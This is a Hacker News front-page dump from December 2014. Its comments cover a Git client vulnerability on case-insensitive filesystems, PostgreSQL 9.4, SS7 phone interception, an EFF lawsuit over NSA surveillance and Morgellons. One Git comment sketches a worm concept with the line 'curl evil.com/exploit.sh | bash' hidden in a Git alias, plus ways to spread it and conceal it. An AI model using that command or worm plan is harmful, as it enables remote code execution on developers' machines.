hacker news with inline top comments, 19 Dec 2014
1
Git client vulnerability announced
433 points by polemic  4 hours ago   104 comments top 23
1
FiloSottile 4 hours ago 5 replies      
Short panic summary: your git/hg remotes can get code execution on your machine when you clone/pull if you are on OSX or Windows.

Summary: on case-insensitive/normalizing filesystems (default on OSX and Windows) it's possible for .git/config to be overwritten by the tree, probably due to a case-sensitive sanity check when the actual file is insensitive. .git/config can contain arbitrary commands to be run on certain events/as aliases, so it leads to code execution. This is a risk when you get a tree from a third party, so on pull/fetch+checkout/clone...

There's an analogous vulnerability in Mercurial.

Update, then run git --version and make sure it's one of v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, or v2.2.1. And be careful when pulling/cloning from third-parties.

EDIT: right, no "or", what are you doing reading this instead of updating?
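
Added example (not part of FiloSottile's comment and not Git's own code): a Python check that contrasts the exact-match comparison the summary suspects with one that folds names the way a case-insensitive, normalizing filesystem compares them. The function names, the list of ignorable code points and the sample paths are assumptions constructed for illustration.

```python
"""Audit tree paths for names that a case-insensitive or normalizing
filesystem would resolve to the repository's .git directory.
Added illustration; every name below is hypothetical, not Git's code."""

# Assumption of this example: the code points HFS+ ignores when comparing
# names (zero-width characters, bidi controls and the BOM).
HFS_IGNORABLE = frozenset(
    [0x200C, 0x200D, 0x200E, 0x200F, 0xFEFF]
    + list(range(0x202A, 0x202F))   # U+202A..U+202E
    + list(range(0x206A, 0x2070))   # U+206A..U+206F
)


def exact_match_is_dotgit(component):
    """Case-sensitive comparison: only the literal name is recognised."""
    return component == ".git"


def folded(component):
    """Approximate the name as the filesystem compares it: ignorable code
    points dropped, then case folded."""
    kept = "".join(ch for ch in component if ord(ch) not in HFS_IGNORABLE)
    return kept.lower()


def resolves_to_dotgit(component):
    """True when the filesystem would treat this component as .git."""
    return folded(component) == ".git"


def audit_tree(paths):
    """Return (path, component) for every path with a component that resolves
    to .git but slips past the exact-match comparison."""
    findings = []
    for path in paths:
        for component in path.split("/"):
            if resolves_to_dotgit(component) and not exact_match_is_dotgit(component):
                findings.append((path, component))
                break  # one finding per path is enough
    return findings


# Constructed sample, shaped like `git ls-tree -r --name-only <commit>` output.
SAMPLE_PATHS = [
    "README.md",
    ".gitignore",                    # benign: different name
    ".github/workflows/ci.yml",      # benign: different name
    "src/git/config.c",              # benign: no leading dot
    ".Git/config",                   # differs from .git only by case
    "vendor/.GIT/config",            # same, nested
    ".g\u200cit/config",             # contains an ignorable code point
]

if __name__ == "__main__":
    for path, component in audit_tree(SAMPLE_PATHS):
        print(f"REJECT {path!r}: component {component!r} resolves to .git")
```

A check of this shape fits a server-side receive hook or a scan of existing repositories, the two measures the GitHub quotes further down this thread mention.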

2
userbinator 20 minutes ago 0 replies      
I think here is a good argument for not using case-insensitive filesystems - because every single filename comparison gets affected and it can lead to vulnerabilities like this (I wonder what others are out there...) Case-insensitive initially feels like a good idea to some, but I think it's a good example of "trying to do too much" and often in subtle ways that even the user might not fully understand - the definition of "case" changes with locale, for instance. In contrast, with filenames that are treated as dumb and simple, plain sequences of bytes that just cannot contain certain characters (and thus compared accordingly for equality, bit-by-bit), there is no need to even consider the concept of "case", and no ambiguity: It either matches exactly or doesn't match.

(I am aware of all the - quite frankly ridiculous - complexity of Unicode characters that are visually identical and "should be treated as such for the purposes of comparison", but I think that's another example of excess complexity leading to things like directory-traversal attacks.)

3
necubi 4 hours ago 6 replies      
Homebrew just updated (https://github.com/Homebrew/homebrew/pull/35105), so Homebrew users should be covered by

    brew update && brew upgrade git

4
yourad_io 4 minutes ago 0 replies      
Isn't it pretty nonchalant that git-scm.com doesn't have a huge red banner advising people to "pay attention and update, or face the pwn"?

Maybe alert banners aren't in the git-scm.com css template.

5
vog 1 hour ago 3 replies      
Ouch! And I thought the OpenBSD people were paranoid for sticking with CVS. (because Git is too bloated and complex in their view, so they weren't able to review it thoroughly, which would have been the only way for them to trust it.)

I always get a strange, uneasy feeling when the tin foil hats turn out to be right.

I wonder if they are right on GPG, too. For those who don't know this: The OpenBSD people refuse to sign their releases with that "far too complex" GPG tool, but created their own lightweight "signify" tool instead. [1]

[1] http://www.tedunangst.com/flak/post/signify

6
jazzychad 3 hours ago 5 replies      
If you don't want to use homebrew on mac, here is the list of commands I used to upgrade: https://gist.github.com/jazzychad/07c0c6da5709202e8106
7
califield 4 hours ago 3 replies      
I was wondering who found this vulnerability. You have to click through to the Git mailing list announcement[1]:

> A big "thanks!" for bringing this issue to us goes to our friends in the Mercurial land, namely, Matt Mackall and Augie Fackler.

It'd be interesting to hear how they came across this. Matt is the leader of the Mercurial project and Augie is a Mercurial core contributor.

This doesn't seem like a high priority upgrade since GitHub now blocks the vulnerability from being pushed to their servers.

[1] http://article.gmane.org/gmane.linux.kernel/1853266

edit: Upgrade ASAP!

8
baldfat 4 hours ago 2 replies      
>In addition, the following updated versions of Git address this vulnerability: Not everyone has the patch.

The Git core team has announced maintenance releases for all current versions of Git (v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, and v2.2.1).

I have one Windows machine and went to update http://git-scm.com/download/win (preview Version 1.9.4)

It was released 3 months ago, on 2014-09-29.

https://msysgit.github.io (Version 1.9.5 preview BUT no documentation that this is for a security fix)

Doesn't seem like I can update my git client

9
ethomson 4 hours ago 0 replies      
Visual Studio is affected by this; Microsoft has released patches for Visual Studio 2013, Visual Studio 2013 Update 4 and an updated Git Provider for Visual Studio 2012. Users of Visual Studio are urged to apply an update.

Brian Harry's blog has more information and links to download URLs for the updates: http://blogs.msdn.com/b/bharry/archive/2014/12/18/git-vulner...

10
tlarkworthy 4 hours ago 2 replies      
> We have also completed an automated scan of all existing content on github.com to look for malicious content that might have been pushed to our site before this vulnerability was discovered

did they find any problems? The post doesn't say...

11
amatix 4 hours ago 1 reply      
Git-worm concept:

* create an alias which does something evil "curl evil.com/exploit.sh | bash;", maybe as a typo (commti?) since "to avoid confusion and troubles with script usage, aliases that hide existing Git commands are ignored"

* exploit code finds other local git repos and infects them (maybe avoiding those with github/bitbucket remotes, since they'll be blocked)

* be innocuous-looking via git config's "include", so the bad aliases aren't obviously visible looking at ~/.gitconfig

12
dshankar 4 hours ago 4 replies      
Where can I find fixed git-related binaries without having to build from source myself? (Sorry, I'm lazy
13
avar 4 hours ago 1 reply      
Link to the patch that fixed it: https://github.com/git/git/commit/cc2fc7c
14
conorgil145 1 hour ago 0 replies      
Any Ubuntu users who are looking to update as a precaution might find this link to the "Ubuntu Git Maintainers" ppa useful: https://launchpad.net/~git-core/+archive/ubuntu/ppa

also: https://stackoverflow.com/questions/19109542/installing-late...

15
mholt 1 hour ago 0 replies      
> Git clients running on OS X (HFS+) or any version of Microsoft Windows (NTFS, FAT) are exploitable through this vulnerability. Linux clients are not affected if they run in a case-sensitive filesystem.

What about case-sensitive Mac file systems, like mine? I would imagine they are not vulnerable and that the author just overlooked this possibility in the article...

16
nodesocket 2 hours ago 1 reply      
I am running OSX Yosemite.

    ~  git --version
    git version 1.9.3 (Apple Git-50)

When I navigate to http://git-scm.com/download/mac it downloads 2.0.1 which was released on 6/29/14. How can I upgrade to 1.9.5?

17
thomasfromcdnjs 3 hours ago 0 replies      
"Otherwise, an unsuspecting user can run git pull from an innocuous-looking-but-malicious repository and have the meta-information in her repository overwritten, or executable hooks installed by the owner of that repository she pulled from (i.e. an attacker)." [1]

You could pull down git hooks that root your box, pretty intense hack, update now!

1. http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-21...

18
sillysaurus3 4 hours ago 2 replies      
Should programs periodically check for critical security fixes, and then refuse to run if the current version is affected?

It seems like there are a lot of people who don't really pay attention to social media or other security alert channels, who won't have a clue about the extent of this vulnerability. I'm sure they'd update if they knew "if I clone a malicious repo, I'm toast," but there's no way to inform them except by HN/Twitter/Reddit/mailing lists.

One could argue that they get what they deserve for being uninformed, but it seems like the ethical obligation might actually be on us to develop tools that ping home and ask whether it needs to stop working until it's updated.

Actually, I'm not sure it's ethical to embed such shutdown behavior into a tool that needs to be reliable. Maybe just a scary warning message like "This version is critically vulnerable, update immediately" every time the program runs would suffice.

19
praseodym 2 hours ago 0 replies      
Apple has fixed this in Xcode 6.2 beta 3: http://support.apple.com/en-us/HT204147
20
sumnulu 3 hours ago 0 replies      
Also, case-insensitive file systems have other problems with git if your team has a sensitive one. Mac defaults to insensitive, and that is not good.
22
jszymborski 3 hours ago 1 reply      
Anybody have an idea when SourceTree will have an update?
23
donutz 3 hours ago 0 replies      
There does not appear to be an updated version of git for cygwin just yet.
2
PostgreSQL 9.4 Released
590 points by petercooper  10 hours ago   150 comments top 29
1
pilif 10 hours ago 5 replies      
Like every year before, the Postgres team has blessed us with an early Christmas present. And like every release post before, I'd like to use this opportunity to say thanks to the team for the awesome job they are doing year after year.

It's not just the database itself (and that's awesome in its own right), but it's also all the peripheral stuff: The documentation is seriously amazing and very complete, the tools that come with the database are really good too (like psql which I still prefer to the various UIs out there).

Code-wise, I would recommend anybody to have a look at their git repo and the way they write commit messages: They are a pleasure to read and really explain what's going on. If everybody wrote commit messages like this, we'd be in a much better place as far as code archaeology is concerned.

Patches from the community are always patiently reviewed and, contrary to many other projects, even new contributors are not really required to have a thick skin nor flame retardant suits. The only thing required is a lot of patience as the level of quality required for a patch to go in is very, very high.

Finally, there's #postgresql on Freenode where core developers spend their time patiently helping people in need of support. Some questions could be solved by spending 30 seconds in the (as I said: excellent) manual and some of them point to really obscure issues, but no matter what time it is: Somebody in #postgresql is there to help you.

I think there's no other free software project out there that just gets everything right: Very friendly community, awesome documentation, awesome tools, and of course an awesome product offering to begin with.

Huge thanks to everybody involved.

Also: Huge YAY for jsonb - I have many, many things in mind I can use that for and I have been looking forward to this for a year now.

2
tracker1 7 hours ago 1 reply      
Just want to say to the PostgreSQL and EnterpriseDB guys that it's always great to see the progress on this. My hope for 9.5/10 is that we will see PLV8 and Replication baked into the actual release.

PLV8 is such a natural fit with the new JSON(B) types that it's probably going to become the most used extension with that data type... And imho sorely missing from the out of the box experience. I'm glad that they've concentrated on getting the data structure and storage right first. Hopefully we'll see this in vNext.

As to replication, I understand that this is part of EnterpriseDB's business model, just the same not having the basic replication pieces baked in, is still lacking compared to other databases. Even if the graphical tooling was commercial only, and all the knob frobbing via config or command line is more complex, having it in the box is a must imho. I actually really like how MongoDB handles their replica sets, and where RethinkDB is going with this as well. Though they aren't transactional SQL databases primarily, it's a must have feature these days. Replication with automagic failover is a feature that has gone past enterprise-only.

One last piece, would be if there were built in functions similar to the String.prototype.normalize that was added to JavaScript... so that input strings could be normalized easier for comparison/indexing, though PLV8 support could/would bring this readily.

All the same, thanks for all of your hard work, and I look forward to the future of PostgreSQL.

3
taspeotis 57 minutes ago 0 replies      
It looks like PostgreSQL is on track to slowly succeed MySQL as the de-facto open source database.

Microsoft tentatively seems to be settling on them as the preferred RDBMS for non-Windows platforms [1]:

> Within ASP.NET 5 our primary focus is on SQL Server, and then PostgreSQL to support the standard Mac/Linux environment.

I use EF+SQL Server and they're very much complementary and provide an excellent developer experience. NHibernate+SQL Server is woeful unless you want to use the loosely-typed Criteria stuff. NH's LINQ provider is terrible and it gets confused at the drop of a hat (call Distinct and then OrderBy? "I'm sorry Dave, I'm afraid I can't do that"). At this point I'm convinced only MS know how to write LINQ providers that won't fall over the moment you try to do something useful with them.

Microsoft writing a LINQ provider for PgSql is a great thing for running .NET code on non-Windows platforms.

[1] http://blogs.msdn.com/b/adonet/archive/2014/12/02/ef7-priori...

4
jeltz 9 hours ago 3 replies      
Looking forward to when we move to 9.4 so I can start using "sum(foo) FILTER (WHERE bar)" instead of the ugly "sum(CASE WHEN bar THEN foo END)".
5
systematical 10 hours ago 1 reply      
Switched over to PostgreSQL for a personal project for the json datatype. Great if you want some mongo-esque document storage without losing out on having a relational database.

http://clarkdave.net/2013/06/what-can-you-do-with-postgresql...

6
mrmondo 3 hours ago 0 replies      
Congratulations to the PostgreSQL team for continuously supporting and improving what is in my mind the best all-round database server out there.
7
radicalbyte 9 hours ago 2 replies      
Next year I really need to switch from MSSQL to Postgres. The work that the Postgres team have done in the last 2-3 years is really amazing.

They are also clearly reaping the benefits of some very smart architectural decisions, and that gives me the confidence that they will be able to continue innovating in the coming years.

8
davidgerard 2 hours ago 0 replies      
Postgres is about to be the new hotness. I mentioned to our hosting provider that we were looking into moving our in-house Oracle and MySQL to Postgres (off Oracle because it's expensive, off MySQL 'cos it's shit) and he said more than a few customers were looking into this precise move.

We're just getting into PG now, and it's just really nice to set up and use. I really wish more web stuff properly supported PG and didn't pretty much require MySQL.

9
gfodor 9 hours ago 0 replies      
JSONB is getting a lot of attention (and deservedly so) but logical decoding is much more exciting to me. Being able to capture postgres transactions to put into a durable log (like Kafka) for downstream processing is a fundamental tool needed to build a unified logging architecture. If you've worked with hadoop you've probably tried to approximate this by hand by taking regular snapshots of your database or something, but this is much, much more sane. Really exciting. Great work postgres team!
10
davidw 6 hours ago 0 replies      
There are a lot of things that have changed since my first programming job, back in 1997. Things that I still use and love: Postgres, and Emacs.
11
squigs25 9 hours ago 0 replies      
I'm really pumped about the update to GIN indexes, and the ability to concurrently update materialized views. Both enhancements are huge for the postgres ecosystem, and especially for productionizing postgres databases.
12
jvinet 6 hours ago 0 replies      
With JSONB here, JSONPath starts to become very interesting...

http://goessner.net/articles/JsonPath/

http://blog.redfin.com/devblog/2012/03/json_in_postgres.html

That article was written before JSON/JSONB showed up, but the idea remains the same.

I didn't have plv8 installed, so I did some plumbing code in plpython. plv8 would be more suitable though.

https://github.com/jvinet/pg-jsonpath

13
mgkimsal 7 hours ago 0 replies      
Is there an equivalent to the MySQL handlersocket stuff in postgresql?

http://www.percona.com/doc/percona-server/5.5/performance/ha...

http://www.slideshare.net/akirahiguchi/handlersocket-2010062...

It might go against the "no transaction" crowd, but seems useful for performance-critical needs. I'm scheduling a bit of testing time with it next week to see if it's something I'd roll out in production (Maria 10 system)

14
codeaken 9 hours ago 3 replies      
Did PostgreSQL just kill MongoDB?
15
gamesbrainiac 10 hours ago 0 replies      
EFF launches an iconic case and PG 9.4 on the same day? This is probably the best day in the year and it's not even Christmas yet.
16
tiffanyh 8 hours ago 0 replies      
I really wish someone would update these benchmarks to the latest releases of Scientific Linux, FreeBSD & Dragonfly

http://www.dragonflybsd.org/performance/

17
atonse 10 hours ago 5 replies      
Great news! I'd love to move over to this from MongoDB for a project that has high uptime requirements. But while I think the JSON will really replace it, does PG have a solution for High Availability (like replica sets) in the works?

I'm newer to Postgres so am not sure. Replica Sets are the killer feature for me, more so than just storing JSON documents. I'd appreciate if someone can chime in. I've done some googling but there seem to be multiple strategies for replication.

18
k_sze 10 hours ago 1 reply      
Bye bye MongoDB.
19
elchief 6 hours ago 0 replies      
Full notes here:

http://www.postgresql.org/docs/9.4/static/release-9-4.html

My favourite parts:

Allow views to be automatically updated even if they contain some non-updatable columns

Allow control over whether INSERTs and UPDATEs can add rows to an auto-updatable view that would not appear in the view. This is controlled with the new CREATE VIEW clause WITH CHECK OPTION.

Allow security barrier views to be automatically updatable

20
netcraft 9 hours ago 2 replies      
How long till someone creates a library with the mongo api?
21
ageyfman 2 hours ago 0 replies      
we currently use 9.4 beta, and it's been rock solid for us. We chose it because of the jsonb data type. JSONB has been a great fit for the type of work that we needed it to do.
22
petercooper 9 hours ago 2 replies      
Are there any good books coming out that cover Postgres 9.4? I know the docs are okay but I want something with more of a narrative structure as my history with Postgres is spotty. The only one I've found so far is O'Reilly's "PostgreSQL: Up and Running, 2nd Edition" coming out this month but would prefer a personal rec.
23
rpedela 8 hours ago 0 replies      
I am pretty happy about the addition of ALTER SYSTEM. I haven't tried it yet, but I think it will make automatic failover to a standby easier to implement. Does anyone have experience with this?
24
steventhedev 10 hours ago 4 replies      
Quick question regarding JSONB:

Is attribute order stable? Obviously, order is not preserved, but if the order changes on subsequent accesses, this causes problems if you ever serve content directly from a jsonb field without sorting the attributes manually.

25
aswanson 8 hours ago 0 replies      
Even though rails hides it from me, I honestly don't mind directly working with the SQL interface on this db, and its language interfaces are awesome. Thanks, team.
26
apetresc 10 hours ago 1 reply      
So when can we expect AWS RDS to support it? :)
27
photograve 9 hours ago 0 replies      
Anyone has a performance benchmark and/or has experience on the scalability on this version?
28
sarciszewski 10 hours ago 0 replies      
Best news I've heard all week. Awesome. Time to update my servers :D
29
curiously 3 hours ago 0 replies      
I just recently began using PostgreSQL, albeit an older version. Does this 9.4 mean that MongoDB is now pretty much a dud? Being able to store, manipulate, query JSON data AND have SQL on an established wheel that has been proven reliable and polished far longer than the age of most other databases?

Are there any code examples (preferably Python) that show how to use JSONB? I'd love to see some examples on how to query every record that contains a key in a json, or order rows based on a value in a json object.

off topic: If Meteor.js implements PostgreSQL 9.4 I would seriously consider using it again. That and maybe make DDP scalable.

3
German researchers discover flaw that could let anyone listen to cell calls
170 points by haakon  6 hours ago   77 comments top 9
1
MichaelCrawford 6 hours ago 3 replies      
There is a maintenance mode in every cell phone that allows it to be remotely turned on, that is, used as a listening device, without your knowledge.

I don't know what authentication is required. I expect that it was designed so that only your cell carrier could enable it, however whatever may have been secret about it, quite likely has leaked out by now.

If you don't want to be listened-to, don't have _any_ cell phones anywhere near you. Not just your own - say you want a private conversation in a public place; the phones of other people in your general vicinity could be switched on to listen to you.

I learned this from a well-known left-wing radical organization known as the United States Air Force, when I applied for the USAF Cyber Command. Their site had a recruiting video, that depicted a couple officers locking their phones into a grounded metal box - a faraday cage - before entering a secure area, that is, a room where secrets were openly discussed.

2
Animats 4 hours ago 2 replies      
Signaling System 7 (SS7) is a big security problem. It's the packet-switched control network for the phone system, and it has very little security. It was designed in 1980 to be run only internally between phone switches.

The main function of SS7 is call setup. All the switches along the route get their switching commands over SS7, not over the circuit-switched channel. (That went out with SS5, the old audio-tone based system). Call setup is preceded by "translation", turning a destination phone number into a route. That's done with query messages over SS7.

This allows outsourced wiretapping. Verisign offers this as a service for telcos, so they don't have to deal with law enforcement themselves.

http://www.verisign.com/static/001927.pdf

Verisign, which also runs much of the US SS7 network (http://www.verisign.com/stellent/groups/public/documents/dat...) is well placed to do this. All they have to do for a wiretap is to have the translations for a source or destination number reroute to a wiretap point, which then records while forwarding to the desired destination. As an SS7 provider, they already have all the call metadata.

Vulnerabilities come in because more parties now have SS7 access. Cellular roaming and VoIP to landline routing are managed over SS7. So a large number of computers other than dedicated telco switches now have SS7 connections. A break-in at any of those points has wiretapping potential.

3
tiler 1 hour ago 0 replies      
A couple of random thoughts on potential applications/uses:

1. Alexandria needs to communicate with Bilbo. Alexandria has the privilege of being trusted by whatever organization she belongs to (be that her country, company, etc) and as such is unmonitored AFAsheKs. Bilbo on the other hand is some fugitive-type and is unable, or perhaps unwilling, to enter direct communication with Alexandria for fear of compromising himself or his beloved Alexandria. Bilbo could then monitor Alexandria's calls for an encoded message via a protocol they predetermine. This protocol could take the form of linguistic or audio steganography. One could imagine all sorts of information being leaked by Alexandria.

2. More realistically this could be a tool for bribery. Monitor a set of vulnerable targets, wait until they reveal something, take a bribe to stay quiet.

3. Or, for the Machiavellian-minded leak information that was supposedly confidential between two parties.

4
darkhorn 3 hours ago 0 replies      
In Turkish Ministry of Foreign Affairs it is forbidden to bring cell phones in to meetings. However it is totally okay to bring tablets and laptops into the meetings. Source: my friend works there.

Edit: phones are forbidden due to the recent spying events.

5
spacefight 5 hours ago 1 reply      
Of course we can be sure, that those fellows were not the first to learn about that.

The hack of belgium telco Belgacom sees more light day by day.

This system is broken beyond repair. We need to build it up from the ground, safe.

6
upofadown 3 hours ago 0 replies      
The only interesting thing here is the new attack at the radio level that allows call monitoring. It sounds like it might be easier than setting up a fake tower. It still sounds like it required an active attack though so in practice the difference might be all that important.
7
guelo 3 hours ago 1 reply      
"anyone" can not listen to your cell calls. Only people that have access to inject commands into the SS7 network that your call is routed through can do that.
8
eyeareque 4 hours ago 0 replies      
One more reason to encrypt every bit we send and to use voip instead of the PSTN/Cellular voice.
9
at-fates-hands 3 hours ago 0 replies      
An interesting read on the current state of SS7, circa 2013:

http://blog.pt.com/vendors-eol-announcement

The 3G/4G segment of subscribers will have a distribution of 3.4 billion using 3G (SS7) services and .9 billion using 4G services. The total outcome of this research indicates that a total of 7.65 billion subscribers, out of a total of 8.5 billion subscribers, will remain on SS7-based networks in 2017.

Verizon went on to further explain that a final 2G/3G (SS7) sunset timeframe decision has not been made.

The good news is vendors are not happy considering the availability of hardware will decrease significantly over the same time period, hopefully speeding the sunset for this technology.

Some service providers are planning on a strategy of consolidating their network, having no support and cannibalizing existing spare equipment for hardware support.

4
EFF in Court to Argue NSA Collection from Internet Backbone Is Unconstitutional
646 points by etr71115  11 hours ago   153 comments top 17
1
diafygi 10 hours ago 3 replies      
FYI, these proceedings are open to the public. I've gone to two of them before to support the EFF. You just wear a suit and sit in the audience quietly. When the arguments (which are fascinating, by the way) are over everyone gets up at the same time and leaves. Hopefully, the judges notice how much public support is there for the EFF.

If you are in the bay area, I highly encourage you to go (this one is very near the Oakland 12th St BART). You are watching history in the making.

2
joshstrange 10 hours ago 4 replies      
If you haven't already go to this link (Probably need to be logged into Amazon):

https://smile.amazon.com/gp/charity/change.html?ie=UTF8&ref_...

And select EFF as your Smile charity. THEN get the browser extension to automatically redirect you to the Smile link:

Chrome: https://chrome.google.com/webstore/detail/smile-always/jgpmh...

Firefox: https://addons.mozilla.org/en-US/firefox/addon/amazonsmilere...

EDIT: I only use the chrome extension, if someone has a better FF extension just let me know and I'll change the link, that was the first one I found.

3
iandanforth 10 hours ago 1 reply      
"Under the government's legal theory, it can copy virtually all Internet communications and then search them from top to bottom for specific "identifiers" - all without a warrant or individualized suspicion - as long as it does so quickly using only automated processes."

Love it. I hadn't thought of it like that before. Just because your search is fast doesn't mean it's not a search.

4
Raphmedia 10 hours ago 2 replies      
This is it. This is the tipping point. I'm donating money to the EFF.
5
0x5f3759df-i 9 hours ago 0 replies      
The title seems a little misleading

>Jewel was filed in 2008 on behalf of San Francisco Bay Area resident Carolyn Jewel and other AT&T customers.

This isn't a new lawsuit, it has just taken forever to even get to this point. The main focus of this case isn't from the Snowden documents but the Snowden documents did open up the case to actually go forward without State Secrets censorship.

6
aragot 10 hours ago 1 reply      
The Fourth only protects 330 million out of 7 billion people.

However, if we don't help US citizens for their democracy, we'll have no weight for ours.

7
gamesbrainiac 10 hours ago 0 replies      
Donating money to EFF. Finally. I've been waiting so long :)
8
spacefight 10 hours ago 0 replies      
This is exactly what we need: worldwide and on a large scale. Bundled with media support, grass roots call for action campaigns and much more.

Let them know we won't accept the status quo.

9
zimbatm 10 hours ago 2 replies      
If I send a copy of a music record by email and the NSA keeps a copy of it, can they be sued for copyright infringement?
10
dustinfarris 9 hours ago 0 replies      
EFF joins the ranks of ACLU in my book. Donated.
11
Constitutional 1 hour ago 0 replies      
The courts do have power in the federal government. If they say that some law is unlawful, then it is not able to be enforced as a law. The courts have that power since the constitution gives it to them. I think that you need to look at constitutional law a little more. The Executive branch does not have more power than the courts or the Congress. By the constitution.
12
csandreasen 1 hour ago 0 replies      
I don't think the EFF is going to win this one. It's not because of some government conspiracy, or the odds being stacked against them or anything like that, but rather because their argument is flawed. As detailed elsewhere on the EFF's site[1], the core of their case centers around NSA's Section 702 Upstream collection. They have more recently hinged their argument on the Privacy and Civil Liberty Oversight Board report on Section 702[2], but the case predates it going back as far as Mark Klein's Room 641A disclosure. The identifiers that the EFF talks about are described in the report as follows:

As noted above, however, all upstream collection - of which "about" collection is a subset - is "selector-based," i.e., based on . . . things like phone numbers or emails. Just as in PRISM collection, a selector used as a basis for upstream collection is not a "keyword" or particular term (e.g., "nuclear" or "bomb") but must be a specific communications identifier (e.g., email address). In other words, the government's collection devices are not searching for references to particular topics or ideas, but only for references to specific communications selectors used by people who have been targeted under Section 702.

In other words, the NSA is searching for the communications of specific people - it's targeted collection. The EFF itself even concedes that they are filtering out wholly domestic communications[3]. Instead of questioning the specific procedures for targeting these people, the likelihood that they may fail and collect an innocent bystander's communications, the procedures dealing with incidental or accidental collection, etc., they are instead taking the stance that the filtering itself is illegal because a packet filter needs to see a packet before determining whether or not it matches the specific communication. As an analogy, if I were to pull up my terminal and run:

  $ seq 1 3 | grep -v 2 | grep 3 > out.txt
... the government is arguing that the collection is the contents of out.txt ("3") and furthermore, they put an extra measure in place to ensure that the number 2 (i.e. purely domestic communications) is never collected. The EFF is arguing that 1, 2 and 3 are all collected because each one exists in grep's buffer for a millisecond before it is discarded - it doesn't matter that it's never seen by a human, entered into a database, written to disk or transmitted elsewhere.

I think I see why the EFF is making that argument: in Clapper v. Amnesty International it was ruled that the plaintiff didn't have standing because they couldn't show that their specific communications had been collected. Jewel v. NSA would likely have the same issue, so to get around it the EFF is instead arguing that the very fact that the NSA is conducting any sort of packet filtering itself constitutes a search and seizure, regardless what safeguards are put in place or whether the filtering is targeted. I think they're grasping for straws with this one - I'd be really surprised if they win. If I were in their place, I'd probably FOIA the hell out of the 702 procedures and look for loopholes instead.

[1] https://www.eff.org/press/releases/eff-asks-judge-rule-nsa-i...

[2] http://www.pclob.gov/Library/702-Report-2.pdf

[3] https://www.eff.org/files/2014/07/24/backbone-3c-color.jpg

13
sgt101 6 hours ago 1 reply      
What Internet Backbone is that? The one that closed in 1995?
14
cevaris 6 hours ago 0 replies      
What???!!
15
cm2187 10 hours ago 3 replies      
I am a supporter of the EFF but I don't really see the point of suing the NSA. If they lose, they will call it something else and keep doing it. And the NSA is only one of the offenders. Don't think foreign gvt aren't doing the same on their side of the cable. The only solution is systematic encryption. The EFF's let's encrypt effort is way more constructive in my mind.
16
LLWM 10 hours ago 7 replies      
All these comments about donating to the EFF. Any way I can donate money to the NSA to balance things out a bit?
17
shawn-butler 9 hours ago 3 replies      
>>>>

The court thus faulted them [the ACLU in ACLU v. NSA, 493 F.3d 644, 648] for assert[ing] a mere belief that the NSA eavesdropped on their communications without warrants. Id. This failure of proof doomed standing. Ultimately Jewel may face similar procedural, evidentiary and substantive barriers as the plaintiffs in ACLU, but, at this initial pleading stage, the allegations are deemed true and are presumed to embrace the specific facts needed to sustain the complaint. [0]

>>>

EFF is on a fishing expedition. I am not unsympathetic. But this judicial arm-twisting and absurd twisting of language / law needs to stop as the road it opens is not helpful to our democracy. They will never be able to justify their claims with anything that will pass evidentiary muster.

Supporting the EFF is all fine but generally a waste of time and money for effecting real change. The only way these programs end is if Congress is full of people who want this to stop and will ensure that it does.

If an obscure libertarian like Grover Norquist can dominate electoral cycles with a "Taxpayer Protection Pledge" why can someone not similarly dominate electoral cycles with a "Privacy Protection Pledge"? Demand every presidential candidate sign it, etc. Make it a real wedge issue.

I wonder if the answer is that US citizens don't care because they don't really see how they are harmed? They believe the Govt is protecting them by doing this?

[0]: http://cdn.ca9.uscourts.gov/datastore/opinions/2011/12/29/10... [pdf]

5
The Itch Nobody Can Scratch
54 points by Thevet  3 hours ago   24 comments top 12
1
sliken 6 minutes ago 0 replies      
Wouldn't it help the patients if the doctor cleaned an area of their affected skin, applied a large gauze pad, and taped it down? Let the patient go home for a few days. If there's new strange threads under it, it's obviously coming from the skin. If it's just threads from the environment, they should be absent.
2
everyone 5 minutes ago 0 replies      
The sufferers' extremely clean behaviour; having 3 showers a day, bathing in bleach, having constantly clean clothes, using various lotions etc etc. is probably going to wreck their skin and cause itching.

Personally my skin is very sensitive and tbh I'm much more comfortable when me, my clothes, bedclothes etc are not cleaned so often. Also I have read that the cleanliness of your average industrialised 1st world country house is far too clean and this may have a role in causing people to develop allergies or have other immune system related issues. We're not designed to live in medieval european city style filth, but we are certainly not designed for hyper-cleanliness either.
3
DanBC 1 hour ago 2 replies      
> Skeptics alike claim is actually at the root of Morgellons. They say that what people like him are really suffering from is a form of psychosis called delusions of parasitosis, or DOP. He is, in other words, crazy.

Fucking unhelpful to frame mental illness like this.

It is intensely frustrating to see people suffering - to the point where they consider suicide - because of the stigma around mental illness.

4
sebular 1 hour ago 0 replies      
Great article. The strangest part for me was the sudden onset that people experienced. When I think of psychological disorders, I think of how symptoms usually start small and gradually get more severe.

Everybody gets small phantom itches from time to time. I think the idea of an "itch nerve malfunction" makes the most sense. One could imagine some sort of infinite loop of itch nerves triggering each other, exacerbated by constant scratching.

Any strange psychological behavior, such as extreme cleanliness, or being convinced that ordinary clothing fibers are the cause, would be an obvious natural response if you couldn't figure out why you were suddenly so itchy.

Also, anyone who has to deal with contact lenses knows that our hands and fingers always have tiny little fibers stuck to them.

5
smrtinsert 30 minutes ago 0 replies      
I felt like the rat mite possibility was left open.
6
ryanmcbride 1 hour ago 0 replies      
The Stuff You Should Know podcast did an episode about this with some pretty great info. Delusional parasitosis is some crazy stuff. http://www.stuffyoushouldknow.com/podcasts/how-morgellons-di...
7
cpncrunch 1 hour ago 0 replies      
Itching is also a symptom of anxiety, so it could be that Morgellons patients get into a vicious circle of anxiety causing itching, which then causes more anxiety.

You can see an extreme example of this itching in alcohol and benzodiazepine withdrawal - apparently it causes feelings of your skin crawling.

8
Blackthorn 40 minutes ago 1 reply      
This one hits pretty close to home for me, because my dad had the "syndrome". He also got it as he was going through withdrawal from a cocaine addiction, so when the CDC report came out (it being a psychiatric condition) it made a lot of sense to me.

I don't really have anything interesting to add to the discussion, just that it's difficult to see a relative suffer like that.

9
wallaceowen20 17 minutes ago 0 replies      
This disease is "documented and described" in the online (then made into a book then made into a movie) "John dies at the end", as an interdimensional goo: http://en.wikipedia.org/wiki/John_Dies_at_the_End
10
cLeEOGPw 2 hours ago 2 replies      
There are countless ways how brain function can go wrong. Feeling things that don't exist is one of them. But even for the smartest people it can be extremely hard to convince himself that what he is feeling is not real.

